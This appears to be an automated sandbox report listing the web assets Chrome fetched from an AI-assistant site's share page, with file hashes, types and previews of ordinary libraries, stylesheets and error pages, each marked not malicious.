                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):406
                                                                                        Entropy (8bit):4.845991472180285
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:2FD0A1D014E411AEEA2D5DC41CEBA835
                                                                                        SHA1:1D40892B0950BAB0B918D69A2671F477E1CE9D1C
                                                                                        SHA-256:F65C7AC74F7050B8B26C6C67B39D4A4E0D0B2DA89AF7B2667462FBCC1D50743B
                                                                                        SHA-512:B0600572283A04D0104AA144E9484B94FDE0A158144CC4F6BBB74FE9F270B9FD687945969C184978E79C1FB6E0B0B931E7759B1FC021B96D2FE7428059D62429
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"errors":[{"message":"This operation has been blocked as a potential Cross-Site Request Forgery (CSRF). Please either specify a 'content-type' header (with a type that is not one of application/x-www-form-urlencoded, multipart/form-data, text/plain) or provide a non-empty value for one of the following headers: x-apollo-operation-name, apollo-require-preflight\n","extensions":{"code":"BAD_REQUEST"}}]}.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (2157)
                                                                                        Category:downloaded
                                                                                        Size (bytes):2214
                                                                                        Entropy (8bit):5.371733557680256
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C31D16F8EAD088B2C20B063263885857
                                                                                        SHA1:8798DF22B6C9DD05067459CCEF63CC65E33519E0
                                                                                        SHA-256:FA4D3B5B74163F13147618F2E70442DA15BEA3BCA45E7EA014D0E10228E9D93D
                                                                                        SHA-512:B790906D096824D381FD47CCDB027B14DFDAA1BDAD4901F2E763D98456BF83B6681C8891E7771CD1657FC6962C66039AFA93A4B97A2C2024E98367AB33C70095
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/ShareResourceScene.BY3t8mu1.js
                                                                                        Preview:import{j as e,S as g,o as j,a as v,cA as y,u as S,Y as T,r as a,b as C,c as R,au as b,av as N,d as w,Q as E,X as l,as as A}from"./index.CmaSzYmM.js";import{R as L,T as _}from"./Layout.CsRrMVM6.js";import{T as M}from"./index.D1TXq2aj.js";import{O as P}from"./Offline.Chq9LeuO.js";import"./decode.I0H7hHej.js";import"./index.DUmOG7j4.js";import"./index.CtWPaFVW.js";import"./YouTube.DOFcxXms.js";import"./Transition.1nOyKJ9c.js";function k(){return e.jsx("div",{className:"h-screen w-full",children:e.jsx("div",{className:"flex h-full w-full items-center justify-center",children:e.jsx(g,{size:32,color:"black"})})})}const I="_editorAreaContainer_vclwv_1",O="_Content_vclwv_14",u={editorAreaContainer:I,Content:O};function D(){const d=v(),s=y("/share/r/:resourceId"),{resourceId:n=""}=S(),{sharedResource:i}=d,m=T(),[r,f]=a.useState(null),[c,o]=a.useState(null),x=C();a.useEffect(()=>{n||o(new Error("No resource id"));async function p(){try{const t=await i.fetchSharedResource(n);if(t)o(null);else{o(n
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (35653)
                                                                                        Category:downloaded
                                                                                        Size (bytes):297595
                                                                                        Entropy (8bit):6.0198888821569625
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:A68EEF460C058C709DC8219147CBFFFB
                                                                                        SHA1:2E0F1187CC24EEDCCAE37B28DC56A4FB4307C466
                                                                                        SHA-256:72DAF83C58F8DE46B9985DCEA0669ADD7714EC0490C7CEEF6F797700DF85BF19
                                                                                        SHA-512:EB6067702CACE7416F7DB66A9BB8D308CB1FEF3CE3312A6D48AD80F91CF1BBFD3393EC2C9E07046B3BD02D461B9EB83E63E5ED6D4535E61C6D937ABFB111E478
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/decode.I0H7hHej.js
                                                                                        Preview:class d0{constructor(e,u,r){this.lexer=void 0,this.start=void 0,this.end=void 0,this.lexer=e,this.start=u,this.end=r}static range(e,u){return u?!e||!e.loc||!u.loc||e.loc.lexer!==u.loc.lexer?null:new d0(e.loc.lexer,e.loc.start,u.loc.end):e&&e.loc}}class p0{constructor(e,u){this.text=void 0,this.loc=void 0,this.noexpand=void 0,this.treatAsRelax=void 0,this.text=e,this.loc=u}range(e,u){return new p0(u,d0.range(this,e))}}class M{constructor(e,u){this.name=void 0,this.position=void 0,this.length=void 0,this.rawMessage=void 0;var r="KaTeX parse error: "+e,a,n,l=u&&u.loc;if(l&&l.start<=l.end){var o=l.lexer.input;a=l.start,n=l.end,a===o.length?r+=" at end of input: ":r+=" at position "+(a+1)+": ";var d=o.slice(a,n).replace(/[^]/g,"$&."),b;a>15?b="."+o.slice(a-15,a):b=o.slice(0,a);var v;n+15<o.length?v=o.slice(n,n+15)+".":v=o.slice(n),r+=b+d+v}var x=new Error(r);return x.name="ParseError",x.__proto__=M.prototype,x.position=a,a!=null&&n!=null&&(x.length=n-a),x.rawMessage=e,x}}M.prototype.__
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):548
                                                                                        Entropy (8bit):4.660801881684815
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:4B074B0B59693FA9F94FB71B175FB187
                                                                                        SHA1:0004D4F82B546013424B2E0DE084395071EEF98B
                                                                                        SHA-256:25FB23868EBF48348F9E438E00CB9B9D9B3A054F32482A781C762CC4F9CC6393
                                                                                        SHA-512:F928E9FAA0BC776FC5D8A0326981853709D437B7B1C2E238894BFB2ACBB627442C425CBB00D369C52D15876B6C795E67F7580341686696D569A908A6ADD4B444
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (4988)
                                                                                        Category:downloaded
                                                                                        Size (bytes):4989
                                                                                        Entropy (8bit):5.323826859374976
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:244301462432EE1C6BA83019100C0047
                                                                                        SHA1:45FDA492028217E4427621E04CB98C81C5573F8A
                                                                                        SHA-256:EBDEE12FDB02CB367BD2203A27A04DDFA5E463D76D3FDB7D7217168A07F07F77
                                                                                        SHA-512:BD916950973C9CB6C52A5C84AEECBD68EF25521573B5919F3772CE728618C92E85A57DBA5E4FEC8DBAFEB4552BEFE1CFA5E2A13EB334A5AD0270E0CF3812E444
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/ActiveTool.BqIvIPyM.css
                                                                                        Preview:._selection_cso94_1{position:absolute;pointer-events:none;top:0;right:0;bottom:0;left:0}._selection_border_cso94_10{position:absolute;top:-5px;right:-5px;bottom:-5px;left:-5px;border-radius:11px;opacity:.2;border-width:5px;border-style:solid}._selection_name_cso94_22{position:absolute;top:-29px;padding:0 6px;border-radius:3px;font-size:12px;line-height:20px;height:20px;color:#fff;right:0}.auto-grow-input:focus-within{outline:-webkit-focus-ring-color auto 1px}._block_todo_vge35_1{display:flex;align-items:flex-start}._checkbox_container_vge35_6{width:1rem;height:1rem;margin-right:.5rem;flex-grow:0;flex-shrink:0;position:relative;display:flex;justify-content:center;align-items:center}._checkbox_element_vge35_18{opacity:0;position:absolute;top:0;left:0;width:100%;height:100%;cursor:pointer}._checkbox_element_vge35_18:hover+._checkbox_vge35_6 ._border_vge35_28,._checkbox_element_vge35_18:focus+._checkbox_vge35_6 ._border_vge35_28{stroke:rgba(var(--color-foreground),.4)}._checkbox_element_vg
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (5960)
                                                                                        Category:downloaded
                                                                                        Size (bytes):351879
                                                                                        Entropy (8bit):5.595903810921996
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:ABED61BAC28697E6D7591239EEC42F98
                                                                                        SHA1:EB890FA979B9BE307DF66F55AAF066DD7AFE0DAC
                                                                                        SHA-256:807457E231A19E36F5B6EE541BB3CB794E8D6075D3CF27A3F3203FDFF20ADE34
                                                                                        SHA-512:26D3AD136266BDF1BC81B73D8D8E5A9E559EECC3037BACB4BBF9B8BA214D33740813525D3C1B4C91F771EE34141179E20CF3AE3F261362CB9C15FB876E134095
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-XL5BHTM4BS
                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):48316
                                                                                        Entropy (8bit):5.6346993394709
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8306)
                                                                                        Category:dropped
                                                                                        Size (bytes):8363
                                                                                        Entropy (8bit):5.5194287298601745
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:662FF3D49A8E020361FC88F800D2AE37
                                                                                        SHA1:BFB7CCD6B88E3D77A208ED09C7D806888FF23A89
                                                                                        SHA-256:5E47081778663519DD5EEDC09CA910E1ECD00CF530D79B5710B2F1B7C543F4FD
                                                                                        SHA-512:8C237BBE8389851B609279DD3FB0D53849E23BFF836244F90880611D7056D9325FA2F837499C4407F4435D2F9CFFC1DBDD12B39E585F85D2390F535520D7FCB6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:import{r as a,J as N,j as e,G as F,d as x,X as k,az as _,S as q,ay as D,c as P,aN as $}from"./index.CmaSzYmM.js";import{M as S}from"./Modal.Bgpq4lFm.js";import{F as y}from"./index.KaME38Zl.js";import{T as B}from"./index.D1TXq2aj.js";import{F as O}from"./ExclamationTriangleIcon.BNGKdN9E.js";import"./index.CLF8hfvb.js";function Z({title:t,titleId:s,...n},o){return a.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:o,"aria-labelledby":s},n),t?a.createElement("title",{id:s},t):null,a.createElement("path",{fillRule:"evenodd",d:"M18 10a8 8 0 1 1-16 0 8 8 0 0 1 16 0Zm-7-4a1 1 0 1 1-2 0 1 1 0 0 1 2 0ZM9 9a.75.75 0 0 0 0 1.5h.253a.25.25 0 0 1 .244.304l-.459 2.066A1.75 1.75 0 0 0 10.747 15H11a.75.75 0 0 0 0-1.5h-.253a.25.25 0 0 1-.244-.304l.459-2.066A1.75 1.75 0 0 0 9.253 9H9Z",clipRule:"evenodd"}))}const G=a.forwardRef(Z);function H({title:t,titleId:s,...n},o){return a.createElement("svg",Ob
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (38979)
                                                                                        Category:downloaded
                                                                                        Size (bytes):39039
                                                                                        Entropy (8bit):5.400766703530016
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:6A7371EF785F86A6B8E47DE6785D82B6
                                                                                        SHA1:CB74876B89246E6425F2358142047585459175A6
                                                                                        SHA-256:8D305B773A07111CCBE178426CE109ADB5570B340ABC9BBE5CFAF3AD333999CE
                                                                                        SHA-512:1AEDB661E4A16E7A838FB875C222B13DC8F1E99D79DABF6946CF64A44BD94516CA02E09DD0D746D39968A784AFE6332BEBADEEE45179DC81ED63FF4345289CC9
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/Authenticated.CHp2mxHq.js
                                                                                        Preview:import{r as p,o as b,a as g,c as O,b as j,as as B,Q as y,j as e,J as Y,aA as Z,aB as x,aC as N,Z as k,aD as I,aE as M,aF as R,aG as A,aH as D,aI as q,X as $,U as w,d as C,aJ as Q,aK as X,aL as K,ax as ee,aM as te,aN as se,S as W,M as re}from"./index.CmaSzYmM.js";import{p as oe,x as ae,E as S,z as ne,$ as ie,R as le,g as ce}from"./RenameChatModal.CU6fIayA.js";import{u as T,a as J,A as de}from"./client.D99P9Ebj.js";import{I as E}from"./index.es.CmVgLGF8.js";import{T as ue}from"./index.D1TXq2aj.js";import{a as V}from"./AITools.DdDAMa67.js";import{A as me}from"./index.DKGvtgp7.js";import"./index.CtWPaFVW.js";import"./list-view-rectangle.CqW52iAy.js";import"./types.ClYGS8-s.js";function he({title:s,titleId:t,...o},a){return p.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:a,"aria-labelledby":t},o),s?p.createElement("title",{id:t},s):null,p.createElement("path",{fillRule:"evenodd",d:"M1
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (3083)
                                                                                        Category:dropped
                                                                                        Size (bytes):230956
                                                                                        Entropy (8bit):5.544444704172014
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:D26741246591CBD135797322DC00A5C6
                                                                                        SHA1:720A85C45F917EFFA616A191436A0B2B40A6F424
                                                                                        SHA-256:67D1188068542451ABD0C089465ACF321E937FE065584187D3272FE1CB6A5C7F
                                                                                        SHA-512:09A1CE9E8C15159AACF08E2190B9394EB45D08B18AA31EDF315B8D0D2ABABD8782DBD361B003D11543B3DEA46A33F617ADD84435BDA829FC88D18046CA0AB5C4
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0xb891000, 0x399, ]);.var aa,ba,ca,da,t,ea,ha,na,oa;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writabl
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (2715)
                                                                                        Category:downloaded
                                                                                        Size (bytes):2716
                                                                                        Entropy (8bit):5.173201664502394
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C5600B59AF0B9DA197DF24691CB2891E
                                                                                        SHA1:19A45460B55B75E99E5901E869BE1511A102C3EF
                                                                                        SHA-256:E8D46120D2B93E09650349DE3A05AE2EFB9B95A36AB3B227A304EE3F92487F78
                                                                                        SHA-512:728EB7792AFA2872B2C5DB158639EDB237204D8017AD1C73D8651B297CD2F22935C4CC6A8B6689C0C841738642C2942070853E3E9C5A1635DD210A6E96A04C2B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/ShareResourceScene.DMUPBnxd.css
                                                                                        Preview:._editorAreaContainer_vclwv_1{margin:0;transition:margin-right .1s ease-out;display:flex;flex-grow:1;flex-basis:auto;flex-direction:column;justify-content:center;flex-shrink:initial;gap:initial}._Content_vclwv_14{transition:margin-left .1s ease-out;display:flex;flex-direction:column;flex-grow:1;flex-basis:auto;justify-content:center;flex-shrink:initial;gap:initial;width:100%;max-width:var(--container-max-width);margin:0 auto;padding:2rem 0 .5rem}@media print{._Content_vclwv_14{margin:0!important}}@media (max-width: 767px){._Content_vclwv_14{margin-left:0!important}}._Presenter_Overlay_vclwv_45{position:relative;width:100%}._Presenter_Overlay_vclwv_45:before{background-image:linear-gradient(#ffffff80,#ffffff72 10.67%,#ffffff65 19.64%,#ffffff5a 27.12%,#ffffff4f 33.33%,#ffffff46 38.51%,#ffffff3e 42.88%,#ffffff36 46.65%,#ffffff2f 50.06%,#ffffff28 53.33%,#fff2 56.68%,#ffffff1b 60.33%,#ffffff15 64.52%,#ffffff0e 69.46%,#ffffff07 75.38%,#fff0 82.5%);content:"";height:72px;pointer-events:none;p
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):6508
                                                                                        Entropy (8bit):4.712715075248598
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:76F67F056EC5A4E2AD13F53143F82455
                                                                                        SHA1:9863E0A978A406F9F5BF34518166DB044B7DA73F
                                                                                        SHA-256:D087C93E54D44797466D7690ADC81907A57120EBC10ED7F73431B6306BD6F777
                                                                                        SHA-512:3FB7DA7814FF137C3701E7F83ED4FA055EA3739A52AADCEF25089328DCCD44759C22547726E2D849634A3A200420C4541C53CAE18A7887AFC58FC7418CEBFB0F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/share/r/RM0eszjvKf
                                                                                        Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta name="robots" content="noindex" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <meta charset="UTF-8" />. <link rel="manifest" href="/client/manifest.webmanifest" />. <link rel="icon" href="/client/imgs/favicon-askalayna.ico" sizes="48x48" />. <link. rel="icon". href="/client/imgs/favicon-askalayna.svg". sizes="any". type="image/svg+xml". />. <link. rel="apple-touch-icon". sizes="180x180". href="/client/imgs/apple-touch-icon.png". />. <link rel="mask-icon" href="/client/imgs/masked-icon.png" color="#FFFFFF" />. <meta name="theme-color" content="#ffffff" />. <link rel="preconnect" href="https://alayna-app.s3.us-west-2.amazonaws.com"/><link rel="stylesheet" href="/client/assets/index.DAq5dCaE.css"/><script type="module" src="/client/assets/index.CmaSzYmM.js"></script>. <script type="application/ld+json">. {. "@context": "http
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text
                                                                                        Category:downloaded
                                                                                        Size (bytes):3145
                                                                                        Entropy (8bit):4.842322330045504
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:F9FABA678C4D6DCFDDE69E5B11B37A2E
                                                                                        SHA1:81A434F94F2B1124F3232BB86F2944F82FB23AC0
                                                                                        SHA-256:7ADAF08052C6A6A0F8A0D0055B4F191FD07389FE41C972B69573472B2ECB406A
                                                                                        SHA-512:EA52D475E439BA178C15B5A6DC23F6EF5975E11B17D71B71F89E71DB27880E49220697954CD853AA28CC13B1A044A2A2EA10AAA2FC02A014E5441102DB433C32
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css
                                                                                        Preview:@charset 'UTF-8';./* Slider */..slick-loading .slick-list.{. background: #fff url('./ajax-loader.gif') center center no-repeat;.}../* Icons */.@font-face.{. font-family: 'slick';. font-weight: normal;. font-style: normal;.. src: url('./fonts/slick.eot');. src: url('./fonts/slick.eot?#iefix') format('embedded-opentype'), url('./fonts/slick.woff') format('woff'), url('./fonts/slick.ttf') format('truetype'), url('./fonts/slick.svg#slick') format('svg');.}./* Arrows */..slick-prev,..slick-next.{. font-size: 0;. line-height: 0;.. position: absolute;. top: 50%;.. display: block;.. width: 20px;. height: 20px;. padding: 0;. -webkit-transform: translate(0, -50%);. -ms-transform: translate(0, -50%);. transform: translate(0, -50%);.. cursor: pointer;.. color: transparent;. border: none;. outline: none;. background: transparent;.}..slick-prev:hover,..slick-prev:focus,..slick-next:hover,..slick-next:focus.{. color: transparent;.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (668)
                                                                                        Category:downloaded
                                                                                        Size (bytes):712
                                                                                        Entropy (8bit):5.256222985012433
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:4E9B571A8DF03D7FA2EF42DCCED28AFE
                                                                                        SHA1:A616AF335DA4139AD191F8483B1207B5400F6FEC
                                                                                        SHA-256:B32BFA4E5ECA516919E40148373F3E4E9A7996B53B398047BA72765EECFF0761
                                                                                        SHA-512:52431FC32CB84233F6593E684EADA70D7595B76E6892AD4086C84FEDFBAD19784FCB20D9D83A36B1A95D08BBB024759195D376BC4153920E21CFCF6C7D427D83
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/index.D1TXq2aj.js
                                                                                        Preview:import{j as t,dz as j,dA as m,dB as h,dC as u,d as g,dD as T}from"./index.CmaSzYmM.js";const _="_tooltip_1l9cn_1",w={tooltip:_};function A({children:s,content:o,open:e,defaultOpen:l,onOpenChange:i,side:r="top",align:a="center",delayDuration:n,asChild:d=!0,showArrow:c=!1,triggerClassname:p,disabled:x,...f}){return t.jsxs(j,{open:e,defaultOpen:l,onOpenChange:i,delayDuration:n,children:[t.jsx(m,{disabled:x,asChild:d,className:p,children:s}),t.jsx(h,{children:t.jsxs(u,{className:g(w.tooltip,"text-[13px] font-medium"),side:r,align:a,sideOffset:6,...f,children:[o,c&&t.jsx(T,{offset:8,width:11,height:5,style:{fill:"var(--tooltipBackground)"}})]})})]})}export{A as T};.//# sourceMappingURL=index.D1TXq2aj.js.map.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (1056)
                                                                                        Category:downloaded
                                                                                        Size (bytes):1057
                                                                                        Entropy (8bit):4.706287032194514
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:D8E858E39ADAE4F17745A0C2888E2FB8
                                                                                        SHA1:F0798237BE79954869375017A0B6565A11A3BDBE
                                                                                        SHA-256:9C15863EEEABCD84516DCA9994D2593D8D53963B213E65D8E8CC71D4FD45A6BE
                                                                                        SHA-512:8C899E8425522D8F5F83B97A8DD2CB62977E3EA12B134E4D77316D7CF4F47EA0B4DCAA248915F3A83994F90B658B9FEC702551EB601BC8620DEAE7D0940F9FD5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/AiToolProvider.BNBOsyPR.css
                                                                                        Preview:@keyframes react-loading-skeleton{to{transform:translate(100%)}}.react-loading-skeleton{--base-color: #ebebeb;--highlight-color: #f5f5f5;--animation-duration: 1.5s;--animation-direction: normal;--pseudo-element-display: block;background-color:var(--base-color);width:100%;border-radius:.25rem;display:inline-flex;line-height:1;position:relative;-webkit-user-select:none;-moz-user-select:none;user-select:none;overflow:hidden}.react-loading-skeleton:after{content:" ";display:var(--pseudo-element-display);position:absolute;top:0;left:0;right:0;height:100%;background-repeat:no-repeat;background-image:var( --custom-highlight-background, linear-gradient( 90deg, var(--base-color) 0%, var(--highlight-color) 50%, var(--base-color) 100% ) );transform:translate(-100%);animation-name:react-loading-skeleton;animation-direction:var(--animation-direction);animation-duration:var(--animation-duration);animation-timing-function:ease-in-out;animation-iteration-count:infinite}@media (prefers-reduced-motion){
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (1572)
                                                                                        Category:downloaded
                                                                                        Size (bytes):11268
                                                                                        Entropy (8bit):5.2924652074864085
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:07C6DA3CB82ED0443DDE703C20B125C3
                                                                                        SHA1:8DCCE8163E79E5DCB0C481B5828F3814857B65BA
                                                                                        SHA-256:C3189AC11DBCBB25357113F12F77D104D44F3C1333FF2300609DFFFD7B4BF0BD
                                                                                        SHA-512:B1691F63D479FBFBA8A555528A6AF7E4F8CDE2A145EA68168F40B2BD1EE3A3B31F0217C729B529D79D84D80F481A4B55C7E3AF33C6B08FFE15AB31AB3F6705D0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:"https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100..900;1,100..900&display=swap"
